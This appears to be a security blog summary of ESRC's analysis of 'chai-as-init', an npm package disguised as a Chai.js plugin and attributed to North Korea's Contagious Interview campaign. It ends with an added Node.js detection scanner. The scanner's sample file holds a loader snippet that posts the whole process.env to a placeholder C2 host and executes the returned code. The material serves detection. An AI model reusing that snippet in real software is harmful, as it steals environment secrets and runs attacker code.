Analysis of the North Korea-origin npm malware package 'chai-as-init' disguised as a Chai.js plugin

2026-06-16 ESTSecurity Analysis of the North Korea-origin npm malware package 'chai-as-init' disguised as a Chai.js plugin

https://blog.alyac.co.kr/5766


ESRC found that the malicious npm package chai-as-init, distributed in versions 1.4.5 through 1.4.7, impersonated a Chai.js plugin while hiding malicious code in only two files copied into a mostly legitimate-looking pino package tree. Loading the package spawned a detached background process and used a second-stage loader to fetch and execute remote JavaScript, with later versions exfiltrating the full process.env before receiving code from Vercel-hosted C2 infrastructure. The recovered v1.4.5 payload collected host, OS, user, WSL, filesystem, and command-output data, encrypted it, and posted it to an attacker server. ESRC attributed the activity to the DPRK-linked Contagious Interview campaign based on matching TTPs including typosquatting, Base64-encoded C2 URLs, environment-variable theft, new Function-based RCE, axios C2 traffic, and Vercel infrastructure.
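As an added example (not code from the ESRC report or from this page), the following Node.js heuristic scanner looks for the traits summarised above, a Base64-encoded C2 URL, a detached child process, whole-process.env access, axios C2 traffic and new Function execution, across an in-memory package tree. The regular expressions, the two-trait threshold, the file names and the placeholder host are my own assumptions.

```javascript
// Added example: static heuristics for the chai-as-init traits described in the
// report, run over a constructed "package tree" (path -> source). The patterns
// and threshold are assumptions for illustration, not ESRC's detection logic.

const INDICATORS = [
  { id: 'dynamic-code',   re: /\bnew\s+Function\s*\(/ },      // new Function(...)-based RCE
  { id: 'detached-spawn', re: /\bdetached\s*:\s*true\b/ },    // detached background process
  { id: 'env-harvest',    re: /\bprocess\.env\b(?![.\[])/ },  // whole process.env, not one key
  { id: 'axios-post',     re: /\baxios\s*\.\s*post\s*\(/ },   // C2 traffic via axios
];
// Long Base64 string literals; only those that decode to a URL are flagged.
const B64_LITERAL = /(["'`])([A-Za-z0-9+/]{16,}={0,2})\1/g;

function decodeBase64Urls(src) {
  const urls = [];
  for (const m of src.matchAll(B64_LITERAL)) {
    const text = Buffer.from(m[2], 'base64').toString('utf8');
    if (/^https?:\/\/[\x21-\x7e]+$/.test(text)) urls.push(text);
  }
  return urls;
}

function scanSource(src) {
  const findings = INDICATORS.filter(i => i.re.test(src)).map(i => i.id);
  const decodedUrls = decodeBase64Urls(src);
  if (decodedUrls.length) findings.push('base64-url');
  // One trait alone is common in benign code; the report describes them
  // combined, so two or more is the threshold used here (assumption).
  return { findings, decodedUrls, suspicious: findings.length >= 2 };
}

// Return only the files that stand out, mirroring "two malicious files
// inside an otherwise legitimate-looking pino tree".
function scanTree(files) {
  return Object.entries(files)
    .filter(([, src]) => scanSource(src).suspicious)
    .map(([path]) => path);
}

// Constructed sample tree; the loader-like file points at a placeholder host.
const B64_URL = Buffer.from('https://c2.example.invalid/api').toString('base64');
const SAMPLE_TREE = {
  'lib/logger.js': 'module.exports = (msg) => process.stdout.write(msg + "\\n");',
  'lib/levels.js': 'module.exports = { trace: 10, debug: 20, info: 30 };',
  'lib/init.js': [
    "const { spawn } = require('child_process'); const axios = require('axios');",
    `const u = Buffer.from('${B64_URL}', 'base64').toString();`,
    "spawn(process.execPath, [__filename], { detached: true, stdio: 'ignore' }).unref();",
    "axios.post(u, { e: process.env }).then(r => new Function(r.data)());",
  ].join('\n'),
};

console.log(scanTree(SAMPLE_TREE)); // [ 'lib/init.js' ]
```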

Indicators of Compromise

